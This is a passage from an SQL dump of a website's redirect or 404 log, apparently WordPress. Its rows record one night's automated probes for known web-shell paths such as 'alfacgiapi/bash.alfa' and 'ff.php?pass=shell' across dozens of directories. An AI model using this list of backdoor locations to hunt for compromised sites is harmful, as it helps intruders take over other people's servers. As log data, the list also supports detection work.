00:00:00',301),(23365,'https://ekvatorprint.com.ua/wp-content/updraft/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:09:11','0000-00-00 00:00:00',301),(23366,'https://ekvatorprint.com.ua/wp-content/updraft/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:09:21','0000-00-00 00:00:00',301),(23367,'https://ekvatorprint.com.ua/wp-content/updraft/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:09:29','0000-00-00 00:00:00',301),(23368,'https://ekvatorprint.com.ua/wp-content/updraft/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:09:37','0000-00-00 00:00:00',301),(23369,'https://ekvatorprint.com.ua/wp-content/updraft/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:09:41','0000-00-00 00:00:00',301),(23370,'https://ekvatorprint.com.ua/wp-content/updraft/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:09:45','0000-00-00 00:00:00',301),(23371,'https://ekvatorprint.com.ua/wp-content/updraft/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:09:49','0000-00-00 00:00:00',301),(23372,'https://ekvatorprint.com.ua/wp-content/updraft/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:09:58','0000-00-00 00:00:00',301),(23373,'https://ekvatorprint.com.ua/wp-content/updraft/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:10:08','0000-00-00 00:00:00',301),(23374,'https://ekvatorprint.com.ua/wp-content/updraft/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:10:16','0000-00-00 00:00:00',301),(23375,'https://ekvatorprint.com.ua/wp-content/updraft/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:10:19','0000-00-00 00:00:00',301),(23376,'https://ekvatorprint.com.ua/wp-content/updraft/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:10:23','0000-00-00 00:00:00',301),(23377,'https://ekvatorprint.com.ua/wp-content/plugins/cekidot/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:10:27','0000-00-00 00:00:00',301),(23378,'https://ekvatorprint.com.ua/wp-content/plugins/cekidot/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:10:35','0000-00-00 00:00:00',301),(23379,'https://ekvatorprint.com.ua/wp-content/plugins/cekidot/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:10:44','0000-00-00 00:00:00',301),(23380,'https://ekvatorprint.com.ua/wp-content/plugins/cekidot/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:10:51','0000-00-00 00:00:00',301),(23381,'https://ekvatorprint.com.ua/wp-content/plugins/cekidot/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:10:55','0000-00-00 00:00:00',301),(23382,'https://ekvatorprint.com.ua/wp-content/plugins/cekidot/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:10:59','0000-00-00 00:00:00',301),(23383,'https://ekvatorprint.com.ua/wp-content/plugins/cekidot/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:11:04','0000-00-00 00:00:00',301),(23384,'https://ekvatorprint.com.ua/wp-content/plugins/cekidot/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:11:12','0000-00-00 00:00:00',301),(23385,'https://ekvatorprint.com.ua/wp-content/plugins/cekidot/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:11:20','0000-00-00 00:00:00',301),(23386,'https://ekvatorprint.com.ua/wp-content/plugins/cekidot/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:11:28','0000-00-00 00:00:00',301),(23387,'https://ekvatorprint.com.ua/wp-content/plugins/cekidot/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:11:32','0000-00-00 00:00:00',301),(23388,'https://ekvatorprint.com.ua/wp-content/plugins/cekidot/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:11:36','0000-00-00 00:00:00',301),(23389,'https://ekvatorprint.com.ua/wp-content/plugins/library/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:11:40','0000-00-00 00:00:00',301),(23390,'https://ekvatorprint.com.ua/wp-content/plugins/library/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:11:50','0000-00-00 00:00:00',301),(23391,'https://ekvatorprint.com.ua/wp-content/plugins/library/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:11:59','0000-00-00 00:00:00',301),(23392,'https://ekvatorprint.com.ua/wp-content/plugins/library/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:12:09','0000-00-00 00:00:00',301),(23393,'https://ekvatorprint.com.ua/wp-content/plugins/library/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:12:13','0000-00-00 00:00:00',301),(23394,'https://ekvatorprint.com.ua/wp-content/plugins/library/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:12:18','0000-00-00 00:00:00',301),(23395,'https://ekvatorprint.com.ua/wp-content/plugins/library/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:12:22','0000-00-00 00:00:00',301),(23396,'https://ekvatorprint.com.ua/wp-content/plugins/library/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:12:31','0000-00-00 00:00:00',301),(23397,'https://ekvatorprint.com.ua/wp-content/plugins/library/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:12:39','0000-00-00 00:00:00',301),(23398,'https://ekvatorprint.com.ua/wp-content/plugins/library/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:12:47','0000-00-00 00:00:00',301),(23399,'https://ekvatorprint.com.ua/wp-content/plugins/library/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:12:51','0000-00-00 00:00:00',301),(23400,'https://ekvatorprint.com.ua/wp-content/plugins/library/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:12:55','0000-00-00 00:00:00',301),(23401,'https://ekvatorprint.com.ua/wp-admin/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:13:00','0000-00-00 00:00:00',301),(23402,'https://ekvatorprint.com.ua/wp-admin/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:13:12','0000-00-00 00:00:00',301),(23403,'https://ekvatorprint.com.ua/wp-admin/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:13:32','0000-00-00 00:00:00',301),(23404,'https://ekvatorprint.com.ua/wp-admin/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:13:55','0000-00-00 00:00:00',301),(23405,'https://ekvatorprint.com.ua/wp-admin/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:14:06','0000-00-00 00:00:00',301),(23406,'https://ekvatorprint.com.ua/wp-admin/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:14:12','0000-00-00 00:00:00',301),(23407,'https://ekvatorprint.com.ua/wp-admin/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:14:19','0000-00-00 00:00:00',301),(23408,'https://ekvatorprint.com.ua/wp-admin/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:14:28','0000-00-00 00:00:00',301),(23409,'https://ekvatorprint.com.ua/wp-admin/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:14:37','0000-00-00 00:00:00',301),(23410,'https://ekvatorprint.com.ua/wp-admin/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:14:45','0000-00-00 00:00:00',301),(23411,'https://ekvatorprint.com.ua/wp-admin/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:14:49','0000-00-00 00:00:00',301),(23412,'https://ekvatorprint.com.ua/wp-admin/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:14:53','0000-00-00 00:00:00',301),(23413,'https://ekvatorprint.com.ua/wp-includes/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:15:26','0000-00-00 00:00:00',301),(23414,'https://ekvatorprint.com.ua/wp-includes/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:15:30','0000-00-00 00:00:00',301),(23415,'https://ekvatorprint.com.ua/wp-includes/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:15:34','0000-00-00 00:00:00',301),(23416,'https://ekvatorprint.com.ua/wp-includes/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:16:02','0000-00-00 00:00:00',301),(23417,'https://ekvatorprint.com.ua/wp-includes/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:16:06','0000-00-00 00:00:00',301),(23418,'https://ekvatorprint.com.ua/wp-includes/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:16:11','0000-00-00 00:00:00',301),(23419,'https://ekvatorprint.com.ua/.tmb/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:20:01','0000-00-00 00:00:00',301),(23420,'https://ekvatorprint.com.ua/.tmb/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:20:10','0000-00-00 00:00:00',301),(23421,'https://ekvatorprint.com.ua/.tmb/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:20:18','0000-00-00 00:00:00',301),(23422,'https://ekvatorprint.com.ua/.tmb/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:20:26','0000-00-00 00:00:00',301),(23423,'https://ekvatorprint.com.ua/.tmb/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:20:31','0000-00-00 00:00:00',301),(23424,'https://ekvatorprint.com.ua/.tmb/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:20:36','0000-00-00 00:00:00',301),(23425,'https://ekvatorprint.com.ua/.tmb/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:20:39','0000-00-00 00:00:00',301),(23426,'https://ekvatorprint.com.ua/.tmb/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:20:49','0000-00-00 00:00:00',301),(23427,'https://ekvatorprint.com.ua/.tmb/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:20:56','0000-00-00 00:00:00',301),(23428,'https://ekvatorprint.com.ua/.tmb/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:21:05','0000-00-00 00:00:00',301),(23429,'https://ekvatorprint.com.ua/.tmb/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:21:09','0000-00-00 00:00:00',301),(23430,'https://ekvatorprint.com.ua/.tmb/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:21:12','0000-00-00 00:00:00',301),(23431,'https://ekvatorprint.com.ua/.quarantine/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:21:16','0000-00-00 00:00:00',301),(23432,'https://ekvatorprint.com.ua/.quarantine/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:21:24','0000-00-00 00:00:00',301),(23433,'https://ekvatorprint.com.ua/.quarantine/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:21:31','0000-00-00 00:00:00',301),(23434,'https://ekvatorprint.com.ua/.quarantine/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:21:39','0000-00-00 00:00:00',301),(23435,'https://ekvatorprint.com.ua/.quarantine/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:21:43','0000-00-00 00:00:00',301),(23436,'https://ekvatorprint.com.ua/.quarantine/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:21:51','0000-00-00 00:00:00',301),(23437,'https://ekvatorprint.com.ua/.quarantine/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:21:54','0000-00-00 00:00:00',301),(23438,'https://ekvatorprint.com.ua/.quarantine/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:22:07','0000-00-00 00:00:00',301),(23439,'https://ekvatorprint.com.ua/.quarantine/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:22:15','0000-00-00 00:00:00',301),(23440,'https://ekvatorprint.com.ua/.quarantine/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:22:24','0000-00-00 00:00:00',301),(23441,'https://ekvatorprint.com.ua/.quarantine/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:22:28','0000-00-00 00:00:00',301),(23442,'https://ekvatorprint.com.ua/.quarantine/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:22:31','0000-00-00 00:00:00',301),(23443,'https://ekvatorprint.com.ua/images/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:23:54','0000-00-00 00:00:00',301),(23444,'https://ekvatorprint.com.ua/images/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:24:05','0000-00-00 00:00:00',301),(23445,'https://ekvatorprint.com.ua/images/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:24:15','0000-00-00 00:00:00',301),(23446,'https://ekvatorprint.com.ua/images/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:24:23','0000-00-00 00:00:00',301),(23447,'https://ekvatorprint.com.ua/images/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:24:27','0000-00-00 00:00:00',301),(23448,'https://ekvatorprint.com.ua/images/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:24:31','0000-00-00 00:00:00',301),(23449,'https://ekvatorprint.com.ua/images/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:24:35','0000-00-00 00:00:00',301),(23450,'https://ekvatorprint.com.ua/images/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:24:42','0000-00-00 00:00:00',301),(23451,'https://ekvatorprint.com.ua/images/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:24:50','0000-00-00 00:00:00',301),(23452,'https://ekvatorprint.com.ua/images/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:24:57','0000-00-00 00:00:00',301),(23453,'https://ekvatorprint.com.ua/images/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:25:01','0000-00-00 00:00:00',301),(23454,'https://ekvatorprint.com.ua/images/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:25:06','0000-00-00 00:00:00',301),(23455,'https://ekvatorprint.com.ua/components/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:25:10','0000-00-00 00:00:00',301),(23456,'https://ekvatorprint.com.ua/components/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:25:18','0000-00-00 00:00:00',301),(23457,'https://ekvatorprint.com.ua/components/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:25:25','0000-00-00 00:00:00',301),(23458,'https://ekvatorprint.com.ua/components/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:25:33','0000-00-00 00:00:00',301),(23459,'https://ekvatorprint.com.ua/components/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:25:36','0000-00-00 00:00:00',301),(23460,'https://ekvatorprint.com.ua/components/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:25:41','0000-00-00 00:00:00',301),(23461,'https://ekvatorprint.com.ua/components/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:25:44','0000-00-00 00:00:00',301),(23462,'https://ekvatorprint.com.ua/components/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:25:51','0000-00-00 00:00:00',301),(23463,'https://ekvatorprint.com.ua/components/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:25:59','0000-00-00 00:00:00',301),(23464,'https://ekvatorprint.com.ua/components/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:26:08','0000-00-00 00:00:00',301),(23465,'https://ekvatorprint.com.ua/components/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:26:12','0000-00-00 00:00:00',301),(23466,'https://ekvatorprint.com.ua/components/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:26:16','0000-00-00 00:00:00',301),(23467,'https://ekvatorprint.com.ua/wordpress/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:26:20','0000-00-00 00:00:00',301),(23468,'https://ekvatorprint.com.ua/wordpress/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:26:27','0000-00-00 00:00:00',301),(23469,'https://ekvatorprint.com.ua/wordpress/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:26:35','0000-00-00 00:00:00',301),(23470,'https://ekvatorprint.com.ua/wordpress/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:26:41','0000-00-00 00:00:00',301),(23471,'https://ekvatorprint.com.ua/wordpress/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:26:45','0000-00-00 00:00:00',301),(23472,'https://ekvatorprint.com.ua/wordpress/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:26:48','0000-00-00 00:00:00',301),(23473,'https://ekvatorprint.com.ua/wordpress/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:26:51','0000-00-00 00:00:00',301),(23474,'https://ekvatorprint.com.ua/wordpress/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:26:59','0000-00-00 00:00:00',301),(23475,'https://ekvatorprint.com.ua/wordpress/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:27:06','0000-00-00 00:00:00',301),(23476,'https://ekvatorprint.com.ua/wordpress/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:27:13','0000-00-00 00:00:00',301),(23477,'https://ekvatorprint.com.ua/wordpress/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:27:16','0000-00-00 00:00:00',301),(23478,'https://ekvatorprint.com.ua/wordpress/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:27:20','0000-00-00 00:00:00',301),(23479,'https://ekvatorprint.com.ua/wp/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:27:23','0000-00-00 00:00:00',301),(23480,'https://ekvatorprint.com.ua/wp/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:27:31','0000-00-00 00:00:00',301),(23481,'https://ekvatorprint.com.ua/wp/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:27:40','0000-00-00 00:00:00',301),(23482,'https://ekvatorprint.com.ua/wp/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:27:47','0000-00-00 00:00:00',301),(23483,'https://ekvatorprint.com.ua/wp/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:27:51','0000-00-00 00:00:00',301),(23484,'https://ekvatorprint.com.ua/wp/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:27:54','0000-00-00 00:00:00',301),(23485,'https://ekvatorprint.com.ua/wp/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:27:58','0000-00-00 00:00:00',301),(23486,'https://ekvatorprint.com.ua/wp/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:28:05','0000-00-00 00:00:00',301),(23487,'https://ekvatorprint.com.ua/wp/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:28:12','0000-00-00 00:00:00',301),(23488,'https://ekvatorprint.com.ua/wp/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:28:20','0000-00-00 00:00:00',301),(23489,'https://ekvatorprint.com.ua/wp/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:28:24','0000-00-00 00:00:00',301),(23490,'https://ekvatorprint.com.ua/wp/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:28:28','0000-00-00 00:00:00',301),(23491,'https://ekvatorprint.com.ua/blog/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:28:32','0000-00-00 00:00:00',301),(23492,'https://ekvatorprint.com.ua/blog/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:28:40','0000-00-00 00:00:00',301),(23493,'https://ekvatorprint.com.ua/blog/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:28:49','0000-00-00 00:00:00',301),(23494,'https://ekvatorprint.com.ua/blog/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:28:56','0000-00-00 00:00:00',301),(23495,'https://ekvatorprint.com.ua/blog/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:29:00','0000-00-00 00:00:00',301),(23496,'https://ekvatorprint.com.ua/blog/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:29:05','0000-00-00 00:00:00',301),(23497,'https://ekvatorprint.com.ua/blog/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:29:08','0000-00-00 00:00:00',301),(23498,'https://ekvatorprint.com.ua/blog/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:29:15','0000-00-00 00:00:00',301),(23499,'https://ekvatorprint.com.ua/blog/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:29:22','0000-00-00 00:00:00',301),(23500,'https://ekvatorprint.com.ua/blog/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:29:30','0000-00-00 00:00:00',301),(23501,'https://ekvatorprint.com.ua/blog/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:29:33','0000-00-00 00:00:00',301),(23502,'https://ekvatorprint.com.ua/blog/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:29:36','0000-00-00 00:00:00',301),(23503,'https://ekvatorprint.com.ua/new/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:29:40','0000-00-00 00:00:00',301),(23504,'https://ekvatorprint.com.ua/new/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:29:46','0000-00-00 00:00:00',301),(23505,'https://ekvatorprint.com.ua/new/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:29:54','0000-00-00 00:00:00',301),(23506,'https://ekvatorprint.com.ua/new/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:30:01','0000-00-00 00:00:00',301),(23507,'https://ekvatorprint.com.ua/new/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:30:06','0000-00-00 00:00:00',301),(23508,'https://ekvatorprint.com.ua/new/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:30:10','0000-00-00 00:00:00',301),(23509,'https://ekvatorprint.com.ua/new/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:30:13','0000-00-00 00:00:00',301),(23510,'https://ekvatorprint.com.ua/new/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:30:22','0000-00-00 00:00:00',301),(23511,'https://ekvatorprint.com.ua/new/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:30:30','0000-00-00 00:00:00',301),(23512,'https://ekvatorprint.com.ua/new/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:30:37','0000-00-00 00:00:00',301),(23513,'https://ekvatorprint.com.ua/new/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:30:40','0000-00-00 00:00:00',301),(23514,'https://ekvatorprint.com.ua/new/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:30:46','0000-00-00 00:00:00',301),(23515,'https://ekvatorprint.com.ua/old/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:30:50','0000-00-00 00:00:00',301),(23516,'https://ekvatorprint.com.ua/old/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:31:00','0000-00-00 00:00:00',301),(23517,'https://ekvatorprint.com.ua/old/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:31:08','0000-00-00 00:00:00',301),(23518,'https://ekvatorprint.com.ua/old/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:31:16','0000-00-00 00:00:00',301),(23519,'https://ekvatorprint.com.ua/old/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:31:20','0000-00-00 00:00:00',301),(23520,'https://ekvatorprint.com.ua/old/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:31:26','0000-00-00 00:00:00',301),(23521,'https://ekvatorprint.com.ua/old/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:31:30','0000-00-00 00:00:00',301),(23522,'https://ekvatorprint.com.ua/old/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:31:37','0000-00-00 00:00:00',301),(23523,'https://ekvatorprint.com.ua/old/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:31:44','0000-00-00 00:00:00',301),(23524,'https://ekvatorprint.com.ua/old/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:31:51','0000-00-00 00:00:00',301),(23525,'https://ekvatorprint.com.ua/old/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:31:55','0000-00-00 00:00:00',301),(23526,'https://ekvatorprint.com.ua/old/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:31:59','0000-00-00 00:00:00',301),(23527,'https://ekvatorprint.com.ua/backup/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:32:03','0000-00-00 00:00:00',301),(23528,'https://ekvatorprint.com.ua/backup/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:32:10','0000-00-00 00:00:00',301),(23529,'https://ekvatorprint.com.ua/backup/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:32:18','0000-00-00 00:00:00',301),(23530,'https://ekvatorprint.com.ua/backup/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:32:27','0000-00-00 00:00:00',301),(23531,'https://ekvatorprint.com.ua/backup/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:32:30','0000-00-00 00:00:00',301),(23532,'https://ekvatorprint.com.ua/backup/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:32:34','0000-00-00 00:00:00',301),(23533,'https://ekvatorprint.com.ua/backup/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-05-04 01:32:37','0000-00-00 00:00:00',301),(23534,'https://ekvatorprint.com.ua/backup/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-05-04 01:32:45','0000-00-00 00:00:00',301),(23535,'https://ekvatorprint.com.ua/backup/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-05-04 01:32:56','0000-00-00 00:00:00',301),(23536,'https://ekvatorprint.com.ua/backup/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-05-04 01:33:05','0000-00-00 00:00:00',301),(23537,'https://ekvatorprint.com.ua/backup/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-05-04 01:33:15','0000-00-00 00:00:00',301),(23538,'https://ekvatorprint.com.ua/backup/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-05-04 01:33:28','0000-00-00 00:00:00',301),(23539,'https://ekvatorprint.com.ua/loader/ff.php?pass=shell',NULL,'','',1,0,'2022-05-04 01:33:38','0000-00-00 00:00:00',301),(23540,'https://ekvatorprint.com.ua/wp-we.php',NULL,'','',1,0,'2022-05-04 01:33:45','0000-00-00 00:00:00',301),(23541,'https://ekvatorprint.com.ua/base.php',NULL,'','',1,0,'2022-05-04 01:34:00','0000-00-00 00:00:00',301),(23542,'https://ekvatorprint.com.ua/dosya.php',NULL,'','',1,0,'2022-05-04 01:34:05','0000-00-00 00:00:00',301),(23543,'https://ekvatorprint.com.ua/batm.php',NULL,'','',1,0,'2022-05-04 01:34:12','0000-00-00 00:00:00',301),(23544,'https://ekvatorprint.com.ua/ids.php',NULL,'','',1,0,'2022-05-04 01:34:16','0000-00-00 00:00:00',301),(23545,'https://ekvatorprint.com.ua/idx.php',NULL,'','',1,0,'2022-05-04 01:34:20','0000-00-00 00:00:00',301),(23546,'https://ekvatorprint.com.ua/wp-js.php?phpshells',NULL,'','',2,0,'2022-05-04 01:34:27','0000-00-00 00:00:00',301),(23547,'https://ekvatorprint.com.ua/wp-inlcudes.php?katib',NULL,'','',1,0,'2022-05-04 01:34:30','0000-00-00 00:00:00',301),(23548,'https://ekvatorprint.com.ua/xcv.php',NULL,'','',1,0,'2022-05-04 01:34:43','0000-00-00 00:00:00',301),(23549,'https://ekvatorprint.com.ua/xm.php',NULL,'','',1,0,'2022-05-04 01:34:50','0000-00-00 